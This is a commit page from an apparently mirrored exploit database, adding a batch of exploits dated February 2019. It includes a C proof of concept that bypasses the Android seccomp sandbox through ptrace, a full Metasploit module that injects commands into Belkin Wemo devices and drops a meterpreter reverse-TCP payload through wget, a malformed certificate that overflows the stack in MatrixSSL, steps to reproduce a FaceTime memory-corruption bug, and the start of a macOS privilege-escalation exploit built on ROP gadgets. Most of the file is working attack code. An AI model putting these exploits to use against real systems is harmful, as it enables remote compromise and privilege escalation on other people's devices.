bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-21

Browse source 
8 changes to exploits/shellcodes

FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)
WinRAR 5.61 - '.lng' Denial of Service
FaceTime - Texture Processing Memory Corruption
Android Kernel < 4.8 - ptrace seccomp Filter Bypass
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation
MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation
Apple macOS 10.13.5 - Local Privilege Escalation

mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers
mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution
Belkin Wemo UPnP - Remote Code Execution (Metasploit)

HotelDruid 2.3 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2019-02-21 05:01:57 +00:00
parent 79a4beaea4
commit 26efc559c7
9 changed files with 3654 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

162
exploits/android/dos/46434.c Normal file
View file

@ -0,0 +1,162 @@
/*
The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents:
Before kernel 4.8, the seccomp check will not be run again
after the tracer is notified. (This means that, on older ker
nels, seccomp-based sandboxes must not allow use of
ptrace(2)even of other sandboxed processeswithout extreme
care; ptracers can use this mechanism to escape from the sec
comp sandbox.)
Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries.
The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace:
================
===== filter 0 (164 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0010 if nr >= 0x00000069: [true +1, false +0]
0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP
0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo)
0011 if nr >= 0x00000068: [true +18, false +17] -> ret TRAP
0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer)
[...]
002a if nr >= 0x00000018: [true +7, false +0]
0032 if nr >= 0x00000021: [true +3, false +0]
0036 if nr >= 0x00000024: [true +1, false +0]
0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP
00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir)
0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP
00a2 ret ALLOW (syscalls: access)
0033 if nr >= 0x0000001a: [true +1, false +0]
0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP
00a2 ret ALLOW (syscalls: ptrace)
0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP
00a2 ret ALLOW (syscalls: getuid)
[...]
================
The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace:
================
# Google Breakpad (crash reporter for Chrome) relies on ptrace
# functionality. Without the ability to ptrace, the crash reporter
# tool is broken.
# b/20150694
# https://code.google.com/p/chromium/issues/detail?id=475270
allow isolated_app self:process ptrace;
================
Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace:
================
===== filter 1 (194 instructions) =====
0001 if arch == AARCH64: [true +2, false +0]
[...]
0002 if arch != ARM: [true +0, false +60] -> ret TRAP
[...]
0074 if nr >= 0x0000007a: [true +1, false +0]
0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP
00c0 ret ALLOW (syscalls: uname)
0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP
00c0 ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
004d if nr >= 0x0000001a: [true +1, false +0]
004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP
00c0 ret ALLOW (syscalls: ptrace)
[...]
===== filter 2 (449 instructions) =====
0001 if arch != ARM: [true +0, false +1] -> ret TRAP
[...]
00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid)
00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace)
01c0 ret TRAP
[...]
007f if nr >= 0x00000073: [true +0, false +5]
0080 if nr >= 0x00000076: [true +0, false +2]
0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone)
[...]
================
Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process.
To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):
================
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <asm/ptrace.h>
#include <sys/uio.h>
int main(void) {
setbuf(stdout, NULL);
pid_t child = fork();
if (child == -1) err(1, "fork");
if (child == 0) {
pid_t my_pid = getpid();
while (1) {
errno = 0;
int res = syscall(__NR_gettid, 0, 0);
if (res != my_pid) {
printf("%d (%s)\n", res, strerror(errno));
}
}
}
sleep(1);
if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach");
int status;
if (waitpid(child, &status, 0) != child) err(1, "wait for child");
if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry");
if (waitpid(child, &status, 0) != child) err(1, "wait for child");
int syscallno;
struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs");
printf("seeing syscall %d\n", syscallno);
if (syscallno != __NR_gettid) errx(1, "not gettid");
syscallno = __NR_swapon;
if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs");
if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall");
kill(child, SIGCONT);
sleep(5);
kill(child, SIGKILL);
return 0;
}
/*
================
If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached.
For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:
================
#include <unistd.h>
#include <sys/syscall.h>
int main(void) {
syscall(__NR_swapon, 0, 0);
}
================
Attaching screenshot from connectbot.
I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches.
*/

148
exploits/hardware/remote/46436.rb Executable file
View file

@ -0,0 +1,148 @@
V##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
},
'Author' => [
'phikshun', # Discovery, UFuzz, and modules
'wvu' # Crock-Pot testing and module
],
'References' => [
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
['URL', 'https://github.com/phikshun/ufuzz'],
['URL', 'https://gist.github.com/phikshun/10900566'],
['URL', 'https://gist.github.com/phikshun/9984624'],
['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
['URL', 'http://www.wemo.com/']
],
'DisclosureDate' => '2014-04-04',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(49152)
])
register_advanced_options([
OptBool.new('ForceExploit', [true, 'Override check result', false]),
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/setup.xml'
)
if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
vprint_good('Wemo-enabled device detected')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
checkcode = check
unless checkcode == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
cmdstager = generate_cmdstager(
flavor: 'wget',
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path),
noconcat: true
)
# HACK: "chmod +x"
cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
cmdstager = cmdstager.join(';')
vprint_status("Regenerated command stager: #{cmdstager}")
execute_command(cmdstager)
end
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/upnp/control/basicevent1',
'ctype' => 'text/xml',
'headers' => {
'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
},
'data' => generate_soap_xml(cmd)
)
end
def generate_soap_xml(cmd)
<<EOF
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
<SmartDevURL>`#{cmd}`</SmartDevURL>
</u:SetSmartDevInfo>
</s:Body>
</s:Envelope>
EOF
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
end
end

98
exploits/linux/dos/46435.txt Normal file
View file

@ -0,0 +1,98 @@
I happened to notice that a public X.509 certificate testcase for CVE-2014-1569 caused a stack buffer overflow in MatrixSSL.
I cleaned up the testcase a bit, to make a better demonstration. You can test it with the certValidate tool that comes with MatrixSSL.
$ gdb -q --args matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem
Reading symbols from matrixssl/matrixssl/test/certValidate...done.
(gdb) r
Starting program: matrixssl/matrixssl/test/certValidate stackbufferoverflow.pem
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Loaded chain file stackbufferoverflow.pem
[0]:berserk.filippo.io
[1]:(null)
WARN subject not provided, SUBJ validation will be skipped
Program received signal SIGSEGV, Segmentation fault.
0x00005555555c5164 in pubRsaDecryptSignedElementExt
(gdb) bt
#0 0x00005555555c5164 in pubRsaDecryptSignedElementExt
#1 0x4141414141414141 in ?? ()
#2 0x0000000000000000 in ?? ()
I believe any client or server that validates certificates will be affected by this, and as MatrixSSL is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult.
The bug is that pubRsaDecryptSignedElementExt() uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below should solve it.
diff --git a/crypto/pubkey/rsa_pub.c b/crypto/pubkey/rsa_pub.c
index f1d57e0..fa36e42 100644
--- a/crypto/pubkey/rsa_pub.c
+++ b/crypto/pubkey/rsa_pub.c
@@ -63,6 +63,12 @@ int32_t psRsaDecryptPubExt(psPool_t *pool,
return PS_ARG_FAIL;
}
+ if (*outlen < key->size)
+ {
+ psTraceCrypto("Error on bad outlen parameter to psRsaDecryptPub\n");
+ return PS_ARG_FAIL;
+ }
+
ptLen = inlen;
/* Raw, in-place RSA decryption. */
I'm filing this issue just for tracking, as the testcase is already public I just went ahead and created a public issue:
https://github.com/matrixssl/matrixssl/issues/26
It looks like the maintainers are preparing to publish version 4.0.2 to correct this bug:
https://github.com/matrixssl/matrixssl/commit/1fe26f3474706fc2dd4acd42a99167171dc34959
-----BEGIN CERTIFICATE-----
MIID+DCCAuCgAwIBAgIIAAAAAAAAAAAwDQYJKoZIhvcNAQEFBQAwYzELMAkGA1UEBhMCVVMxITAf
BgNVBAoTGFRoZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg
MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNjA1MDUxNDUwMzMAFw0xNzA1MDUxNDU1MzMA
MHMxCzAJBgMAAAAAAgAAMRIwEAYDAAAAAAkAAAAAAAAAAAAxGzAZBgMAAAAAEgAAAAAAAAAAAAAA
AAAAAAAAADEWMBQGAwAAAAANAAAAAAAAAAAAAAAAADEbMBkGA1UEAxMSYmVyc2Vyay5maWxpcHBv
LmlvMIIAADANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6AAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAIDAAAAo4EAMIGcMAAGA1UdDwEBAAQAAwIAADAABgNVHSUEADAUBggAAAAAAAAAAAYI
AAAAAAAAAAAwAAYDVR0TAQEABAAwADAABgNVHQ4EAAQUAAAAAAAAAAAAAAAAAAAAAAAAAAAwHwYD
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwHQYDAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAMA0GCSqGSIb3DQEBBQUAA4IBAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoU9YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAIRcuKDsOIw8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh
MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE
YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3
MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo
ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg
MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN
ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA
PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w
wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi
EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY
avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+
YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE
sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h
/t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5
IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj
YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD
ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy
OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P
TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ
HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER
dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf
ReYNnyicsbkqWletNw+vHX/bvZ8=
-----END CERTIFICATE-----

129
exploits/macos/dos/46433.txt Normal file
View file

@ -0,0 +1,129 @@
There is a memory corruption issue that occurs when processing a malformed RTP video stream in FaceTime. It appears to be related to processing textures.
* thread #7, stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
* frame #0: 0x00007fff56baaa92 CoreVideo`CVMetalTextureBacking::releaseBackingUsage() + 20
frame #1: 0x00007fff56bae4c4 CoreVideo`CVMetalTextureCache::bufferBackingNotInUse(CVBufferBacking*) + 258
frame #2: 0x00007fff56b9eac5 CoreVideo`CVBufferBacking::releaseUsage() + 79
frame #3: 0x00007fff56bab20e CoreVideo`CVMetalTexture::finalize() + 42
frame #4: 0x00007fff55093e7c CoreFoundation`_CFRelease + 284
frame #5: 0x00007fff617bdac5 VideoToolbox`VTMetalTransferSessionTransferImageSync + 3096
frame #6: 0x00007fff6176f4fb VideoToolbox`VTPixelTransferSessionTransferImage + 11922
frame #7: 0x000000010629b3cb CMIOUnits`___lldb_unnamed_symbol331$$CMIOUnits + 773
frame #8: 0x000000010629909e CMIOUnits`___lldb_unnamed_symbol325$$CMIOUnits + 1868
frame #9: 0x0000000106297aa4 CMIOUnits`___lldb_unnamed_symbol322$$CMIOUnits + 5338
frame #10: 0x000000010630bb3b CMIOUnits`___lldb_unnamed_symbol1297$$CMIOUnits + 347
frame #11: 0x000000010627fda7 CMIOUnits`___lldb_unnamed_symbol193$$CMIOUnits + 267
frame #12: 0x00000001062bf2bb CMIOUnits`___lldb_unnamed_symbol630$$CMIOUnits + 26
frame #13: 0x00000001062f8061 CMIOUnits`___lldb_unnamed_symbol1126$$CMIOUnits + 65
frame #14: 0x000000010630bac0 CMIOUnits`___lldb_unnamed_symbol1297$$CMIOUnits + 224
frame #15: 0x000000010627fda7 CMIOUnits`___lldb_unnamed_symbol193$$CMIOUnits + 267
frame #16: 0x00000001062bf2bb CMIOUnits`___lldb_unnamed_symbol630$$CMIOUnits + 26
frame #17: 0x00000001062f8061 CMIOUnits`___lldb_unnamed_symbol1126$$CMIOUnits + 65
frame #18: 0x0000000106316e34 CMIOUnits`___lldb_unnamed_symbol1387$$CMIOUnits + 376
frame #19: 0x000000010627fda7 CMIOUnits`___lldb_unnamed_symbol193$$CMIOUnits + 267
frame #20: 0x0000000106317612 CMIOUnits`___lldb_unnamed_symbol1392$$CMIOUnits + 54
frame #21: 0x00000001062c009c CMIOUnits`___lldb_unnamed_symbol654$$CMIOUnits + 55
frame #22: 0x00007fff560868c9 CoreMediaIO`CMIOGraph::PullOutputUnits(bool, bool&, bool&, bool&) + 279
frame #23: 0x00007fff56086eee CoreMediaIO`CMIOGraph::DoWork(unsigned int) + 836
frame #24: 0x00007fff56089543 CoreMediaIO`CMIO::Thread::QueuedTWorkThread<unsigned int>::DoWork() + 125
frame #25: 0x00007fff56092c67 CoreMediaIO`CMIO::Thread::SignaledThread::ThreadLoop() + 227
frame #26: 0x00007fff56092b5a CoreMediaIO`CMIO::Thread::SignaledThread::WorkQueuedThreadCallback(void*) + 154
frame #27: 0x00007fff55f6c98b CoreMedia`figThreadMain + 277
frame #28: 0x00007fff7d10c661 libsystem_pthread.dylib`_pthread_body + 340
frame #29: 0x00007fff7d10c50d libsystem_pthread.dylib`_pthread_start + 377
frame #30: 0x00007fff7d10bbf9 libsystem_pthread.dylib`thread_start + 13
(lldb) down
frame #0: 0x00007fff56baaa92 CoreVideo`CVMetalTextureBacking::releaseBackingUsage() + 20
CoreVideo`CVMetalTextureBacking::releaseBackingUsage:
-> 0x7fff56baaa92 <+20>: jmpq *0x48(%rax)
0x7fff56baaa95 <+23>: popq %rbp
0x7fff56baaa96 <+24>: retq
0x7fff56baaa97 <+25>: nop
Additional crash dumps are attached.
This bug can be reached if a user accepts a call from a malicious caller. This issue only affects FaceTime on iOS and Mac. I tested on iOS 12.1.1 and Mac OS X 10.13.6.
To reproduce issue on a Mac:
1) Add the line:
(subpath "/out")
to the (allow file-read* file-write* section of /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb
2) Add the line:
(allow file-read* file-write*
(subpath "/out"))
to com.apple.identityservicesd.sb and restart the host
3) Compile video-replay-avc.cpp using:
g++ -std=c++11 -g -dynamiclib -o librecord.so video-replay-avc.cpp
4) Copy the output lib, librecord.so to /usr/lib/libSP.so
5) Sign the library by calling:
sudo codesign -f -s - /usr/lib/libSP.so
6) Compile video-replay-identity.cpp using:
g++ -std=c++11 -g -dynamiclib -o librecord_IDS.so video-replay-identity.cpp
7) Copy the output lib, librecord_IDS.so to /usr/lib/libSP_IDS.so
8) Sign the library by calling:
sudo codesign -f -s - /usr/lib/libSP_IDS.so
9) Download and build https://github.com/Tyilo/insert_dylib
10) Copy /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference to a local directory and run the command below.
insert_dylib --strip-codesig /usr/lib/libSP.so AVConference
11) Copy AVConference_patched to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference
12) Sign the binary by calling:
sudo codesign -f -s - /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference
13) Copy /System/Library/PrivateFrameworks/IDSFoundation.framework/Versions/Current/IDSFoundation to a local directory and run the command below.
insert_dylib --strip-codesig /usr/lib/libSP_IDS.so IDSFoundation
14) Run the following commands, quickly, in sequence:
sudo cp IDSFoundation_patched /System/Library/PrivateFrameworks/IDSFoundation.framework/Versions/Current/IDSFoundation
sudo codesign -f -s - /System/Library/PrivateFrameworks/IDSFoundation.framework/Versions/Current/IDSFoundation
NOTE: If you are too slow, the terminal may crash because it detects IDSFoundation is unsigned. If this happens, open up the terminal and try the codesign call again. The terminal usually stays open a second or two before it crashes.
15) Extract out.zip into /out and make it world readable
16) Kill the avconferenced and identityservicesd processes. They will restart automatically
17) Make a FaceTime call to the target.
I performed these steps on a MacBook Air running 10.14.1
Taking a second look at this, the root cause of this issue is probably an overflow in splitting RED packets:
0 libsystem_platform.dylib 0x00007fff7d106164 _platform_memmove$VARIANT$Haswell + 580
1 com.apple.AVConference 0x00007fff646cb3f9 VCAudioRedBuilder_UpdateAudioPacketWithRedPayload + 50
2 com.apple.AVConference 0x00007fff6486360b _VCAudioReceiver_SplitRedPacket + 166
3 com.apple.AVConference 0x00007fff648646e7 _VCAudioReceiver_ProcessRTPPacket + 140
4 com.apple.AVConference 0x00007fff64861c40 _VCAudioReceiver_ReceiveProc + 272
5 com.apple.AVConference 0x00007fff64824db1 VCRealTimeThread_ThreadProc + 601
6 com.apple.CoreMedia 0x00007fff55f6c98b figThreadMain + 277
7 libsystem_pthread.dylib 0x00007fff7d10c661 _pthread_body + 340
8 libsystem_pthread.dylib 0x00007fff7d10c50d _pthread_start + 377
9 libsystem_pthread.dylib 0x00007fff7d10bbf9 thread_start + 13
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46433.zip

932
exploits/macos/local/46428.m Normal file
View file

@ -0,0 +1,932 @@
#import <Cocoa/Cocoa.h>
#import <dlfcn.h>
#import <mach-o/dyld.h>
#import <mach-o/getsect.h>
#import <mach/mach_vm.h>
#import <pthread.h>
#import "offsets.h"
//utils
#define ENFORCE(a, label) \
do { \
if (__builtin_expect(!(a), 0)) \
{ \
timed_log("[!] %s is false (l.%d)\n", #a, __LINE__); \
goto label; \
} \
} while (0)
// from https://stackoverflow.com/questions/4415524/common-array-length-macro-for-c
#define COUNT_OF(x) ((sizeof(x)/sizeof(0[x])) / ((size_t)(!(sizeof(x) % sizeof(0[x])))))
#define BYTE(buff, offset) (*(uint8_t *)&((uint8_t *)buff)[offset])
#define DWORD(buff, offset) (*(uint32_t *)&((uint8_t *)buff)[offset])
#define QWORD(buff, offset) (*(uint64_t *)&((uint8_t *)buff)[offset])
// constants used by the exploit
#define CFSTRING_SPRAY_SIZE (400*1000*1000)
#define CFSTRING_SPRAY_COUNT ((CFSTRING_SPRAY_SIZE)/(3*0x8+sizeof(str_array)))
#define CFSET_SPRAY_SIZE (300*1000*1000)
// pointers (80*8) + internal size (0x40)
#define CFSET_SPRAY_COUNT ((CFSET_SPRAY_SIZE)/(80*8+0x40))
#define VULN_IDX (-0xaaaaab)
// 4GB should be enough and it's the maximum we can spray in one OOL
#define ROP_SPRAY_SIZE (4*0x400ul*0x400ul*0x400ul - 0x1000)
#define SPRAYED_BUFFER_ADDRESS 0x200006000
#define NB_CORE_SWITCH 50
#define NB_HOLES_PER_SWITCH 1000
#define NB_REUSE 200
// private functions (both private and public symbols)
static int (* SLSNewConnection)(int, int *);
static int (* SLPSRegisterForKeyOnConnection)(int, void *, unsigned int, bool);
static mach_port_t (* CGSGetConnectionPortById)(uint32_t);
static int (* SLSReleaseConnection)(int);
static mach_port_t (* SLSServerPort)(void);
// push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax]
#define SAVE_RBP_SET_RAX_GADGET ((uint8_t[]){0x55, 0x48, 0x89, 0xe5, 0x48, 0x8b, 0x47, 0x08, 0x31, 0xf6, 0xba, 0x18, 0x01, 0x00, 0x00, 0xff, 0x10})
// mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi]
#define SET_RSI_GADGET ((uint8_t[]){0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x30, 0xff, 0x16})
// mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi]
#define SET_RDI_GADGET ((uint8_t[]){0x48, 0x8b, 0x7e, 0x30, 0x48, 0x8b, 0x46, 0x38, 0x48, 0x8b, 0x30, 0xff, 0x16})
// mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax
#define POP_RBP_JMP_GADGET ((uint8_t[]){0x48, 0x8b, 0x46, 0x10, 0x48, 0x8b, 0x70, 0x20, 0x48, 0x8b, 0x46, 0xf8, 0x48, 0x8b, 0x00, 0x5d, 0xff, 0xe0})
static int resolve_symbols();
static int build_rop_spray(void **rop_spray, char *command_line);
static int massage_heap(int connection_id);
static int register_application(int connection_id);
static int setup_hooks(int connection_id);
static int trigger_the_bug(int connection_id);
static int reuse_allocation(int connection_id);
static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size);
static void timed_log(char* format, ...);
static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate);
static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number);
static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id);
int main(int argc, char **argv)
{
int connection_id = -1;
void *rop_spray = NULL;
bool free_application = false;
ENFORCE(argc == 2, fail);
